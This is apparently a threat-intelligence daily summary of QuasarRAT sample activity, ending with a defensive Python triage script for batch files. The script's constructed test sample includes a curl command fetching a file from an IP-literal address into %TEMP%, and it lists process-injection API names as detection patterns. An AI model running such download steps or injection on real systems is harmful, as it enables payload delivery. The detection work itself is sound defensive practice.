Daily Summary
QuasarRAT activity declined sharply on 2026-06-21 with only 3 new samples detected, representing a 74% drop from the 7-day average of 12. This continues a downward trend, though the sample types suggest possible shifts in delivery tactics rather than an overall threat reduction.
New Samples Detected
The three samples collected today introduce an unusual diversity in file types: one .bat, one .xlsm, and one .exe. The presence of a .bat file is notable, as QuasarRAT historically favors compiled executables or macro-enabled Office documents. This suggests threat actors may be experimenting with script-based initial access, possibly to bypass static analysis rules that flag common PE headers.
Distribution Methods
The inclusion of an .xlsm sample aligns with ongoing phishing campaigns, but the concurrent appearance of a .bat file is unexpected. Delivery as a .bat file often points to automated droppers sent as spear-phishing attachments or shared via cloud storage links. This mix may indicate a small but targeted wave rather than broad spamming, as volume is low enough to suggest hand-picked victims.
7-Day Trend
Today’s 3 samples represent a 74% decline from the 7-day average of 12, placing activity at a quarter of typical levels. This deviation exceeds the 25% threshold for highlighting a trend change. The drop could reflect operational pauses by established groups, shifts to other RATs, or pre-staging for a larger campaign, but sustained monitoring is needed before concluding a genuine downturn.
Security Analysis
The low sample count alongside the appearance of .bat files is a non-obvious development, as QuasarRAT payloads in script form are rare. This may indicate actors probing detection gaps in environments that focus on Office macros or PE files but overlook batch scripts flagged as “low risk.” Defenders should update detection rules to flag any .bat file that attempts process injection, network connections to uncommon ports, or downloads from IP addresses, especially in conjunction with recent user-reported email anomalies.
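One way to express the static part of that rule, as an added example that is not taken from this report or from any vendor rule set: a triage function that scans batch script text for URLs with IP-literal hosts, explicit ports outside an allow-list, and references to Win32 APIs commonly associated with process injection. The `COMMON_PORTS` set, the API name list, the rule names and the sample script are assumptions made for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

COMMON_PORTS = {80, 443}  # assumption: tune to what is normal on your network
INJECTION_APIS = ("VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")
URL_RE = re.compile(r"""\b(?:https?|ftp)://[^\s"'<>|&)]+""", re.I)

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def triage_bat(text):
    """Return (line_no, rule, evidence) tuples for one batch script's text."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.replace("^", "").strip()  # cmd escape char can split keywords
        if line.lower().startswith(("rem ", "::")):
            continue  # comment lines never execute
        for url in URL_RE.findall(line):
            try:
                parts = urlsplit(url)
                host, port = parts.hostname or "", parts.port
            except ValueError:  # malformed host or port
                continue
            if is_ip_literal(host):
                findings.append((no, "ip-literal-url", url))
            if port is not None and port not in COMMON_PORTS:
                findings.append((no, "uncommon-port", url))
        for api in INJECTION_APIS:
            if api.lower() in line.lower():
                findings.append((no, "injection-api", api))
    return findings

# Constructed sample (not from the report); 203.0.113.0/24 is a documentation range.
SAMPLE = r'''@echo off
rem constructed sample
curl -s -o "%TEMP%\u.dat" h^ttp://203.0.113.10:9001/u.dat
curl -s -o "%TEMP%\doc.pdf" https://example.com/doc.pdf
powershell -c "<constructed: P/Invoke declaration naming WriteProcessMemory>"
'''

if __name__ == "__main__":
    for finding in triage_bat(SAMPLE):
        print(finding)
```

Static matching like this only covers what is visible in the script text; runtime behaviour such as actual network connections still needs endpoint or network telemetry.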